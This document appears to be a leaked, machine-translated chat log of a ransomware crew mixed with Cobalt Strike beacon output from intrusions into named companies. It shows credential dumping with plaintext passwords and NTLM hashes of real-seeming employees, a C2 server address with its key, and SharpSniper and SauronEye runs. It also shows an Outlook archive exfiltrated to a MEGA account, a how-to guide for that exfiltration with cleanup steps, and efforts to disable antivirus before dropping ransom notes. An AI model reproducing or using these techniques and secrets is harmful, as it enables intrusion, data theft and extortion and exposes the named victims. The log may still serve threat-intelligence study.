 Name : Barracuda Orange Backup Server
	URL : http://10.1.8.14/auth/signin/

	Name : Barracuda Crockett Backup Server
	URL : http://10.1.5.44/auth/signin/
    
	Name : Barracuda Crockett Backup Server
	URL : http://10.1.5.34/auth/signin/

	Name : Barracuda Backup RCH
	URL : http://10.1.1.14/auth/signin/
    
	Name : ORG Barracuda Networks Login
	URL : http://10.1.8.232/web/login?_bcsp=1&_bceq=U2FsdGVkX1_ZQKJqbA-A6J1pDS0v348lRBF4gQRaT1Oos5iW-joM_MbMEGYcdA1LafroouYOUK8fDhjDdsOT4mCUAGvUboqz-KCiF9iyFEw.

	Name : CRT Barracuda Networks Login
	URL : http://10.1.5.180/web/login?_bcsp=1&_bceq=U2FsdGVkX1-zFQuAcSM8y3KXKFNCE-epeWxGww7gw37-3-IbBQlsFBC_6dk77rKf2OplTxoJjBY2xSAtaA0JEgq7yd9tbiBEUiNt-wZbBYo.


89.0.10.104:445 (platform: 500 version: 6.1 name: NAS-D5-E2-B8 domain: WORKGROUP
````GAPROC (null)````
List of domain trusts:

    0: GAPROC (null) (Direct Outbound) (Direct Inbound)
    1: RTPCO rtpco.local (Direct Outbound) (Direct Inbound)
    2: ALLOY us.alloypolymers.com (Forest tree root) (Primary Domain) (Native)
``````
alloy\Administrator 66ac9a770e02cfdded6d5bd957a774fb
``will do it, what would not be deleted 50 normal ? if your coba not deleted them usually 300 + how much slipshow goodnight clean files before tomorrow slipshow tomorrow as usual then finish for today joined user1, throw in the confab + I will help those who do not have sessions help those who have them write to him конфу@tl1HN.LOCAL
Pomayu alexandruokne, still throw me a session in the slipstream may have a file with authorization or with the creed, maybe lucky you what do you mean by configs citrix?then you go out now looking for citrix configsx apparently yes@tl1 i think the machine is not in the domain at all+@tl1 i have a session hung up i took myself INTUNETEST, the domain does not show, as i gather the info i will write you.com those who do not have their networking confab write domains+will have something to work with if they fall off, if there are not taken - take away +++ have taken everything?losalna write the domains to make the confu da, starta I do not I do not I have no immediately do myself a spawn wait I have not + took one secws2 so far what 3 disassembled? yesok rephrase, where to turn off plugins? or you mean modules cna ?It turns out only 3 sessions as a option disable all plugins and then turn on, do not bother yet@tl1 In others hang open where can you check it?although there has been a minute timeout someone of you is a plugin that deletes "inactive" sessionsа where they disappear where have they gone? Where have sessions leftcreate a confab when your session reaches the coba check that arrives, if AV lab simply user1-9 without binding to the group * come in, choose a session, make a spawn in your coba, in the comment to the session, write what user took, I do confabobshak?
107.161.123.170:50050 DCYZLqYmoVxQj2ITcxQ8rXA5zkAttl
``Where are the objects while you have time to remember yesterday's material@tl1 We have datacenter2 so on rdp and won't let you in... Reboot it or something.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
``````
beacon> shell ping BOBXPS.waterway.com
[*] Tasked beacon to run: ping BOBXPS.waterway.com
[+] host called home, sent: 55 bytes
[+] received output:
Pinging BOBXPS.waterway.com [192.168.0.18] with 32 bytes of data:
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Reply from 192.168.0.222: Destination host unreachable.
Ping statistics for 192.168.0.18:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
 
beacon> shell ping BobsLaptop.waterway.com
[*] Tasked beacon to run: ping BobsLaptop.waterway.com
[+] host called home, sent: 59 bytes
[+] received output:
Pinging BobsLaptop.waterway.com [192.168.90.3] with 32 bytes of data:
Reply from 192.168.90.3: bytes=32 time=138ms TTL=127
Reply from 192.168.90.3: bytes=32 time=59ms TTL=127
Reply from 192.168.90.3: bytes=32 time=149ms TTL=127
Reply from 192.168.90.3: bytes=32 time=63ms TTL=127
Ping statistics for 192.168.90.3:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 59ms, Maximum = 149ms, Average = 102ms
```
```
beacon> shell dir \\192.168.90.3\D$
[*] Tasked beacon to run: dir \192.168.90.3\D$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.
 
beacon> shell dir \\192.168.0.18\C$
[*] Tasked beacon to run: dir \\192.168.0.18\C$
[+] host called home, sent: 52 bytes
[+] received output:
The network path was not found.
```
```
beacon> shell wmic /node:192.168.90.3 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.90.3 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:
Node - 192.168.90.3
ERROR:
Description = The RPC server is unavailable.
 
beacon> shell wmic /node:192.168.0.18 logicaldisk get description,name
[*] Tasked beacon to run: wmic /node:192.168.0.18 logicaldisk get description,name
[+] host called home, sent: 87 bytes
[+] received output:
Node - 192.168.0.18
ERROR:
Description = The RPC server is unavailable.
``I wanted to clarify it tooBobsLaptopBOBXPS(
```
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/exec-ass/SharpSniper.exe Bob Administrator 1853Gators
[*] Tasked beacon to run .NET program: SharpSniper.exe Bob Administrator 1853Gators
[+] host called home, sent: 113763 bytes
[+] received output:
[-] Invoke_3 on EntryPoint failed.
In fact, only he left>name: Bob Dubinsky from here `CN=IT `let's look into the other technareim I think they made for their admins left-handed users So have written that have tried all YES with and without the domain and with different variations of passwords) pancake need to try nimblewhere ?there everything is clean there i checked the centers and vmvar was not seen except for the link in the browser in the doc that i threw a long time ago showed the settings nimbles are associated with hypervisors no or vmvarevcentronu and what virtualization center are you talking about?)hypervisor)is that even what? on the one I threw vmvare - empty there can be access to the disk with snapshots from nimblau nimblau have the ability to integrate into such things blauer you do not have go to the center of virualization is it on the technicians?
https://infosight.hpe.com/InfoSight/media/cms/active/public/pubs_Windows_Integration_Guide_NWT_5_0_0.whz/wmt1480648506910.html
``just in case i also tried root:root have you triedadmin:admin?
```
>operatingSystem: Hyper-V Server
``there's only something like this
```
>description: Failover cluster virtual network name account
```
```
>servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01
>servicePrincipalName: Microsoft Virtual System Migration Service/WWHV01.waterway.com
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01.waterway.com
>servicePrincipalName: Microsoft Virtual Console Service/WWHV01 waterway.
URL : https://store.vmware.com/store/
Username : mharper@waterway.com
Password : 1Vanilla2
```
there is such you have found in vcenter? on request goyya in slack found only access on wwsql-messages much and searches dolnoosch to push? at mail on Root and with different variations of clears that found already and with @ and through slash tried[ ](https://mediaeveryone.com/group/waterway-com?msg=q9dxQCkFZ5u9xASRH) them it seems the first checkA with domains on nimbel do not roll?)ah, well there empty I just see that in the dashboard are also esks, you can not look :) what? esksynu did not anything interesting? then check the rest of the grouppusto there in ncentral is a group eskha suddenly too fast beacon?) nothing there beaconednu and screenshots along the way did I do so
```
shell start /b MEGAcmdServer.exe
shell MEGAclient.exe login
``[ ](https://mediaeveryone.com/group/waterway-com?msg=MaLx72xmqbWiJ5J58) just now saw) no. not so. through execute192.168.0.254 and then in the psentrall let's run with the domains their passwords with root what is thereDid everyone try the admin account?[ ](https://mediaeveryone.com/group/waterway-com?msg=QC5rcecgmouaadQh7) -tied!!!yes, binding to the domain and should specify the domain or Rootmb domain?or take their mailboxes and delete the message about successful authorization from all of us wait until they leavetwo variatudes, already found the creeds[ ](https://mediaeveryone.com/group/waterway-com?msg=gqZeK3Fm7KJkoQg4H).okeytak more beautifula what is it for? `WATERWAY\djarden MyNewPassword6 ``why I concluded that this local ipacot where I throw the sock gets to vvdk2 and when connected there by rds dedik` ``
C:\Users\Administrator>ping -n 1 127.0.1.1

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
``with dk2''.
beacon> shell ping -a -n 1 127.0.1.1
[*] Tasked beacon to run: ping -a -n 1 127.0.1.1
[+] host called home, sent: 53 bytes
[+] received output:

Pinging 127.0.1.1 with 32 bytes of data:
Reply from 127.0.1.1: bytes=32 time<1ms TTL=128

Ping statistics for 127.0.1.1:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

```+
```
	 * Username : djarden
	 * Domain : WATERWAY
	 * Password : MyNewPassword6
``Yes, that's why there's no union on any host under creeds``.
	 * Username : djarden@waterway.com
	 * Domain : (null)
	 * Password : DJarden6
``````
	msv :
	 [00000003] Primary
	 * Username : djarden
	 * Domain : WATERWAY
	 * NTLM : 8c7ce287451c3bbd94b08733f0d4f8d7
	 * SHA1 : d5ee0ca5701d49cd73ffe72244bc481fbecf29e6
	 * DPAPI : 8b55a307cd3193b311053ee63498ecda
	tspkg :
	 * Username : djarden
	 * Domain : WATERWAY
	 * Password : MyNewPassword6
``logon from winlogon request or browser history if not, then logonpasswordsdetermine hash first check it win10? is there a session there? do I have a netego clear pass?[ ](https://mediaeveryone.com/group/waterway-com?msg=ktF5emnAqvxCPLyA7) relatively fresh...[ ](https://mediaeveryone.com/group/waterway-com?msg=6fjrvSMLTyH4ABN4i) on ip 127....04/25/2019 09:51:35 AMDate of message?check your mail...and it's mostly requests for changeover password 200+ results[ ](https://mediaeveryone.com/group/waterway-com?msg=nWZSfPGBEWbrKpQGC) here's tacoenu useless info there[ ](https://mediaeveryone.com/group/waterway-com?msg=YJ8DGBmfEcKZKN9TA) 1there's mostly tacoenu by nimble did you search only by ip?
beacon> shell ping -a 192.168.0.75
[*] Tasked beacon to run: ping -a 192.168.0.75
[+] host called home, sent: 51 bytes
[+] received output:

Pinging nimble-group1.waterway.com [192.168.0.75] with 32 bytes of data:
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64
Reply from 192.168.0.75: bytes=32 time<1ms TTL=64

Ping statistics for 192.168.0.75:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 0ms, Maximum = 0ms, Average = 0ms

``And the host is called something else and I don't think it's a group without a domain.
nimble-group1.waterway.com
nimble...did you check the hostname? 2 years ago it was the same but we tried to check harper's access or you mean rdcheck my mail? if harper's online should i check it but i don't know if it's192.168.0.If he's not online, should he check on his desktop? I think he has notes on the desktop where he may have access ... screenshot of the desktop ... in processes only if he does not have a dropbox hanging in his browser
SauronEye.exe -d C: D: G: Q: -c 192.168.0.43 -f .* -s
``okay later let's have a look, I think the sauron setting is wrong, don't find it in the dj
	 === SauronEye ===

Directories to search: C:, D:, G:, Q:, password, nimble, pwd
For file types: .*
Containing:
Search contents: True
Search Office 2003 files for VBA: False
Max file size: 1024 KB
Search Program Files directories: True
Searching in parallel: C:
Searching in parallel: G:
Searching in parallel: D:
Searching in parallel: Q:
Searching in parallel: password
Searching in parallel: nimble
Searching in parallel: pwd
[*] Done searching file system, now searching contents
[*] Done searching file system, now searching contents

 Done. Time elapsed = 00:00:00.0388757

have you tried sauron? have you downloaded it?
beacon> shell start /b MEGAcmdServer.exe
[*] Tasked beacon to run: start /b MEGAcmdServer.exe
[+] host called home, sent: 57 bytes
```
```
beacon> shell MEGAclient.exe update --auto=off
[*] Tasked beacon to run: MEGAclient.exe update --auto=off
[+] host called home, sent: 63 bytes
[+] received output:
 -------------------------------------------------------------------------------
| ENABLING AUTOUPDATE BY DEFAULT. You can disable it with "update --auto=off" |
 -------------------------------------------------------------------------------
Automatic updates disabled
```
```
beacon> shell MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
[*] Tasked beacon to run: MEGAclient.exe login jyszkivtedxvrqbbit@upived.online teguiQWERmjsd
[+] host called home, sent: 98 bytes
[+] received output:
 ---------------------------<Terms of Service Update>---------------------------
| Our revised Terms of Service, Privacy and Data Policy, and Takedown Guidance |
| Policy apply from January 18th 2021 |
| View Terms: https://mega.nz/updatedterms |
| Execute "psa --discard" to stop seeing this message |
 -------------------------------------------------------------------------------
```
```
beacon> shell MEGAclient.exe whoami
[*] Tasked beacon to run: MEGAclient.exe whoami
[+] host called home, sent: 52 bytes
[+] received output:
Account e-mail: jyszkivtedxvrqbbit@upived.online
```
```
beacon> shell MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z"
[*] Tasked beacon to run: MEGAclient.exe put -q --ignore-quota-warn "C:\Users\Djarden\Documents\Outlook Files\ol.7z"
[+] host called home, sent: 121 bytes
``Well, that's how it turns out that the computer's been lagging so badly!``
```
3) Start background MEGAcmdServer.exe
```
it turns out:
```
shell start /b MEGAcmdServer.exe
```
and go
Or I just do conditionally
```
shell MEGAclient.exe login ....
```
and it's ok? why?
1) Create folder for files
2) Uploads exe and dll files to created folder
``Read the guide files and it will take 2 gb, about 20 min.
MegaNZ usage

1) Create folder for files
2) Uploads exe and dll files to created folder
3) Start background MEGAcmdServer.exe
4) Use the commands:
> MEGAclient.exe update --auto=off # disable autoupdate for megacmd
> MEGAclient.exe login login password # init session by creds
> MEGAclient.exe # check connection
> MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process]
> MEGAclient.exe ls # check remote directory
> MEGAclient.exe logout # end session
> MEGAclient.exe quit # kill MEGAcmdServer.exe
5) Remove special folder for MEGAcmd.
6) Remove update task from schtasks:
> schtasks /query /FO list | findstr /i "mega"
> SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F



example:

> MEGAclient.exe update --auto=off
Automatic updates disabled
> MEGAclient.exe login supertest@mail.test P@$$w0rd

> MEGAclient.exe whoami
Account e-mail: supertest@mail.test
> MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt

> MEGAclient.exe ls
test.txt
> MEGAclient.exe logout
Logging out...
> MEGAclient.exe quit

> schtasks /query /FO list | findstr /i "mega"
Folder: \MEGA
TaskName:      \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000
> SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F
``Console mega client''.
WW99NAS - Synology DiskStation - Mozilla Firefox
=======
[backspace]Ui0wyarwy08!Watray0n08
```ggZxzf8Z1rhnIzswMo86-Q so and so кудаjyszkivtedxvrqbbit@upived.online
teguiQWERmjsd to anonymous disposable mailchat through torregej ak heremeganz2 gba further tell me how to do it faster to start in the archive):zany_face:so what to 7zip and see you tomorrow?
[-] screenshot from desktop 1 is empty
``I mean the screenshot``

 Directory of C:\Users\Djarden\Desktop

01/02/2021 10:07 AM <DIR> .
01/02/2021 10:07 AM <DIR> .
07/23/2019 08:05 AM 9,780,208 05 loyalty log on 07.23.2019 cargo not working.txt
02/04/2019 02:23 PM 1,097 1 Everything you need.xlsx - Shortcut.lnk
02/12/2019 01:55 PM 2,153 2018FirewallReview .xlsx - Shortcut.lnk
08/29/2019 09:03 PM 59,664 2019 Import into PDI.xlsx
10/16/2019 03:46 PM 2,368 2019 Wash and Membership Price Changes.xlsx - Shortcut.lnk
07/22/2019 07:39 AM 0 60bainbridge.txt
08/22/2020 01:15 PM 1,049,521 Base CCC Discounts.xlsx
01/31/2019 09:10 PM 1,104 Calls.xlsx - Shortcut.lnk
01/30/2018 08:58 AM 1,075 ccc - Shortcut.lnk
01/10/2020 09:59 AM 11,573 Copy of Declined Card Log for 31.xlsx
06/05/2019 10:22 AM 400 Daily Processing.appref-ms
04/20/2017 03:09 PM <DIR> DBF files
11/04/2019 02:09 PM 0 DRB times.txt
01/09/2019 12:53 PM 1,303 Dropbox.lnk
06/01/2016 12:29 PM 22,528 Email on Phone Instructions.doc
06/27/2019 10:12 PM 1,517 Examples of spam.txt
10/24/2019 01:56 PM <DIR> Express_ENU
03/07/2019 09:02 AM 573 Fast Pass Lookup.sql
01/24/2019 09:51 AM 2,466 GitHub Desktop.lnk
09/10/2019 10:46 AM 11,233,441 HHSupport_20190910_1144.zip
07/19/2019 02:15 PM 54 I auditor.txt
11/23/2020 09:15 AM 9,175,040 Intranet.mdb
01/11/2019 12:21 PM <DIR> ipad crap
11/27/2018 04:16 PM 632 IT - Shortcut.lnk
06/19/2019 03:32 PM 516 Kingshighway email.txt
08/09/2019 12:11 PM 57,300 KingshighwayLoyalty.xlsx
01/06/2020 11:26 AM <DIR> Logs from #61
01/06/2020 11:27 AM 4,703 Logs from #61.zip
12/11/2019 12:25 PM 10 logs.txt
07/22/2019 07:46 AM 1,271,961 Loyalty log 5 after loyalty code change.txt
10/24/2019 09:34 AM <DIR> Lty Database #22
06/02/2018 08:06 AM 701 Marketing Folder.lnk
09/16/2019 08:34 AM 1,324 MarketingPLUs .xlsx - Shortcut (2).lnk
04/03/2020 08:28 AM 1,295 Microsoft SQL Server Management Studio 18.lnk
01/30/2018 12:12 PM <DIR> Mobile Device Center Windows 10 1709 Fix
02/06/2019 05:19 PM 775 My F Drive Folder.lnk
09/20/2019 01:42 PM 16,734 NATHAN MARY.docx
01/06/2020 10:43 AM <DIR> New folder
06/18/2019 12:03 PM <DIR> Notes to portal
12/03/2019 09:00 AM 2,435 OneNote 2016.lnk
02/07/2018 11:11 AM 4,089 Phone & Internet Providers.xls - Shortcut.lnk
08/11/2020 09:39 AM <DIR> Printer
06/19/2019 10:11 AM <DIR> Program Data Zip
12/24/2020 11:55 AM 87,778 Program Data Zip (2).zip
08/24/2017 02:50 PM 4,064 Program License.lnk
01/31/2017 02:40 PM 1,215 Remote Desktop Connection.lnk
01/22/2020 10:48 AM 2,359 RemoteDesktopManagerFree.lnk
01/06/2020 10:48 AM 2,236 RingCentral Meetings.lnk
09/19/2019 02:44 PM 1,361 Safety Tablets and Iauditor Info.lnk
01/02/2021 10:07 AM 2,250 Slack.lnk
07/14/2018 12:53 PM 1,342 Spotify.lnk
10/20/2019 05:13 PM 2,141 SQL Edits.xlsx - Shortcut.lnk
05/07/2018 03:27 PM 1,134 System Scheduler.lnk
12/11/2019 03:33 PM <DIR> Tickets
02/19/2020 11:14 AM 906 Transfer Look up.sql
07/18/2019 04:07 PM 9,471,921 Unit 05 Loyalty Log issues with Cargo Charges.txt
11/13/2019 12:51 PM 18,459 Unit 31 11/12/2019.xlsx
01/06/2020 10:44 AM 770,963 Unit 61 files 01062020.zip
02/07/2019 01:11 PM 2,390 Upgrading internet service providers.xlsx - Shortcut.lnk
02/12/2019 01:56 PM 19,879 waterway 2-11.xlsx
04/22/2019 11:57 AM 17,690 waterway 4-22.xlsx
05/15/2019 10:18 AM 17,953 waterway 5-9.xlsx
01/30/2018 11:47 AM 2,435 Windows Mobile Device Center.lnk
07/24/2018 12:40 PM 3,486 wwsql ccc KingshighwayLoyalty.odc

he doesn't have any notes on his desktop by any chance? DJARDEN maybe it's there maybe we can get his backup correspondence they must have access within the car he probably deleted all the way there's no fucking thing or on the cars maybe he can find something on nimble try it maybe sauron can look it up?it's a slack, i'm for me, where's it from and where? ok, i'll check his history, he also has info on nimbleDJARDEN\c$\Users\DjardenDo you know where to click x to win? try him, i don't) `dressingAUDY\administrator DressinGaudy4` have you tried him?

 PID PPID Name Arch Session User
 --- ---- ---- ---- ------- ----
 0 0 [System Process]
 4 0 System x64 0 NT AUTHORITY\SYSTEM
 2320 4 smss.exe x64 0 NT AUTHORITY\SYSTEM
 1532 10816 HostedAgent.exe x86 0 NT AUTHORITY\SYSTEM
 1988 1532 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 7364 1532 logWriter.exe x86 0 NT AUTHORITY\SYSTEM
 12808 7364 conhost.exe x64 0 NT AUTHORITY\SYSTEM
 2444 2436 csrss.exe x64 0 NT AUTHORITY\SYSTEM
 2520 2512 csrss.exe x64 1 NT AUTHORITY\SYSTEM
 2528 2436 wininit.exe x64 0 NT AUTHORITY\SYSTEM
 2656 2528 services.exe x64 0 NT AUTHORITY\SYSTEM
 2416 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 2992 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5264 2992 WmiPrvSE.exe x64 0 NT AUTHORITY/\NETWORK SERVICE
 8920 2992 rundll32.exe x64 1 DRESSINGAUDY\Administrator
 13528 2992 WmiPrvSE.exe x64 0 NT AUTHORITY\SYSTEM
 27592 2992 WmiPrvSE.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 38536 2992 ApplicationFrameHost.exe x64 1 DRESSINGAUDY\Administrator
 3052 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 3216 2656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 3224 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 3364 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 3436 2656 svchost.exe x64 0 NT AUTHORITY/NETWORK SERVICE
 3644 2656 svchost.exe x64 0 NT AUTHORITY/LOCAL SERVICE
 4364 2656 svchost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 4608 2656 svchost.exe x64 0 NT AUTHORITY/UNETWORK SERVICE
 5012 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5180 2656 spoolsv.exe x64 0 NT AUTHORITY\SYSTEM
 5268 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5336 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 5372 2656 BaCBTStatusTracking.exe x86 0 NT AUTHORITY\SYSTEM
 5380 2656 BackupExtender.exe x86 0 NT AUTHORITY\SYSTEM
 5404 2656 Microsoft.ActiveDirectory.WebServices.exe x64 0 NT AUTHORITY\SYSTEM
 5416 2656 LMIGuardianSvc.exe x64 0 NT AUTHORITY\SYSTEM
 5436 2656 snmp.exe x64 0 NT AUTHORITY\SYSTEM
 5444 2656 ramaint.exe x64 0 NT AUTHORITY\SYSTEM
 5480 2656 QBIDPService.exe x86 0 NT AUTHORITY\SYSTEM
 5512 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 34252 5512 w3wp.exe x64 0 IIS APPPOOL\DefaultAppPool
 5520 2656 dns.exe x64 0 NT AUTHORITY\SYSTEM
 5536 2656 dsm_sa_eventmgr64.exe x64 0 NT AUTHORITY\SYSTEM
 5560 2656 dsm_sa_datamgr64.exe x64 0 NT AUTHORITY\SYSTEM
 5568 2656 QBCFMonitorService.exe x86 0 NT AUTHORITY\SYSTEM
 5576 2656 ScreenConnect.ClientService.exe x86 0 NT AUTHORITY\SYSTEM
 4936 5576 ScreenConnect.WindowsClient.exe x64 1 DRESSINGAUDY\Administrator
 11660 5576 ScreenConnect.WindowsClient.exe x64 1 NT AUTHORITY\SYSTEM
 5600 2656 sqlbrowser.exe x86 0 NT AUTHORITY\LOCAL SERVICE
 5608 2656 sqlwriter.exe x64 0 NT AUTHORITY\SYSTEM
 5620 2656 svchost.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 5732 2656 SSUService.exe x86 0 NT AUTHORITY\SYSTEM
 5740 2656 ismserv.exe x64 0 NT AUTHORITY\SYSTEM
 5832 2656 QBDBMgrN.exe x86 0 NT AUTHORITY\SYSTEM
 5848 2656 atashost.exe x86 0 NT AUTHORITY\SYSTEM
 5864 2656 dfsrs.exe x64 0 NT AUTHORITY\SYSTEM
 7680 2656 vds.exe x64 0 NT AUTHORITY\SYSTEM
 7784 2656 TmListen.exe x64 0 NT AUTHORITY\SYSTEM
 12008 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 13712 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 16748 13712 dasHost.exe x64 0 NT AUTHORITY\LOCAL SERVICE
 13808 2656 msdtc.exe x64 0 NT AUTHORITY\NETWORK SERVICE
 13916 2656 svcGenericHost.exe x86 0 NT AUTHORITY\NETWORK SERVICE
 14124 2656 Intuit.QBDT.Webconnector.QBWCMonitor.exe x86 0 NT AUTHORITY\SYSTEM
 13968 14124 Intuit.QBDT.Webconnector.Application.exe x86 1 DRESSINGAUDY\Administrator
 14496 2656 TmCCSF.exe x64 0 NT AUTHORITY\SYSTEM
 15348 2656 Ntrtscan.exe x64 0 NT AUTHORITY\SYSTEM
 16340 2656 LogMeIn.exe x64 0 NT AUTHORITY\SYSTEM
 19640 2656 svchost.exe x64 0 NT AUTHORITY\SYSTEM
 2672 2528 lsass.exe x64 0 NT AUTHORITY\SYSTEM
 2580 2512 winlogon.exe x64 1 NT AUTHORITY\SYSTEM
 3124 2580 dwm.exe x64 1 Window Manager\DWM-1
 36984 2580 fontdrvhost.exe x64 1 DRESSINGAUDY\Administrator
 41508 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 45152 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 45596 2580 mstsc.exe x86 1 NT AUTHORITY\SYSTEM
 2932 3484 sihost.exe x64 1 DRESSINGAUDY\Administrator
 3848 15192 PccNtMon.exe x64 1 DRESSINGAUDY\Administrator
 4376 5632 explorer.exe x64 1 DRESSINGAUDY\Administrator
 14284 12980 QBWebConnector.exe x86 1 DRESSINGAUDY\Administrator
``what processes are active? and not from the lada? get your lan dk up there, there's an admin av
i turned on the rdp, now let me in, but does not let me into the wind - an error, something with the procylem Where can you not go? ``https://www.bleepingcomputer.com/forums/t/617257/ransomnotecleaner-remove-ransom-notes-left-behind/``Give me a session/agent-deactivate-start-stop.html
```
Pinging accounting2.DressinGaudy.local [172.16.1.247] with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.
``Trendmicro is scrambling the note? You have to turn it off anyway.``
 the text is scrambling
it's deleting it.
this can be fixed, but av will still block the build itself
Did you throw dasox from a different place on the dk?
====== AntiVirus ======

  Engine : Trend Micro Security Agent
  ProductEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

  Engine : Windows Defender
  ProductEXE : windowsdefender://
  ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

  Engine : Trend Micro Security Agent
  ProductEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
  ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

``fuck... can't kill the avi process like this get up there just trendmicro? ahahvs still deletednu process poleliv through kmd can't kill the avi process? let's make a vid and spread out why on dk? can't go to dk if on dk can't get to dk how?in any case, drop av with the message deleted padlazalizatelno zależali rdmi with the content of "123" hane, hand threw and it disappeared unscramble av and vindefotivno not sure that encrypt everything> it starts and go av in the process blockchitsya bastards will remove the download and zależy file 123 in readme.txt here i copied where tajip riddmi asked to download what file? leave through echo)
beacon> shell echo 1 > C:\readme.txt
[*] Tasked beacon to run: echo 1 > C:\readme.txt
[+] host called home, sent: 53 bytes
beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

01/19/2021 05:07 PM 4 readme.txt
               1 File(s) 4 bytes
               0 Dir(s) 541,679,837,184 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
1

``I throw it in the root and it disappears<kznm
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes
beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
``echo 1 > C:\readme.\ exactly there?
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes
beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

``I don't know if it's correct and don't know if everything just put in C:\ put in the same 5 pk yes, by hand everything encrypts, only the file doesn't appear by hand * by hand put in DC don't know how long will it be? -Trend and other things have turned off everything? -And in others? Here lies accounting2930b fil 01/19/2021 16:52:06 readme.txt
beacon> ls C:\
[*] Tasked beacon to list files in C:\
[+] host called home, sent: 20 bytes
[*] Listing: C:\

 Size Type Last Modified Name
 ---- ---- ------------- ----
          dir 04/24/2014 10:17:32 $AVG
          dir 05/05/2014 14:50:25 $Recycle.Bin
          dir 01/13/2021 00:36:32 $WinREAgent
          dir 03/11/2014 14:27:30 _FedEx
          dir 04/12/2013 16:26:21 BIN
          dir 06/13/2015 09:33:14 bootdrv
          dir 06/13/2015 09:33:13 CMCLanDesk
          dir 01/15/2021 17:30:47 Config.Msi
          dir 12/01/2020 12:12:25 CounterPoint SQL Tutorials
          dir 01/19/2021 10:17:28 PM CPAccounting
          dir 04/03/2013 14:41:34 dell
          dir 07/14/2009 00:08:56 Documents and Settings
          dir 03/10/2014 13:00:44 Drivers
          dir 01/24/2018 11:46:42 HP_Color_LaserJet_Pro_MFP_M477
          dir 02/28/2014 15:46:04 HP_ePrint
          dir 10/07/2013 16:59:18 HP_ePrint_Mobile
          dir 03/04/2014 10:55:01 HP_LJ300-400_color_MFP_M375-M475
          dir 10/07/2013 16:53:39 HP_LJM425_scan_upgrade_11_1
          dir 07/23/2020 22:10:48 inetpub
          dir 06/23/2016 08:37:33 Intel
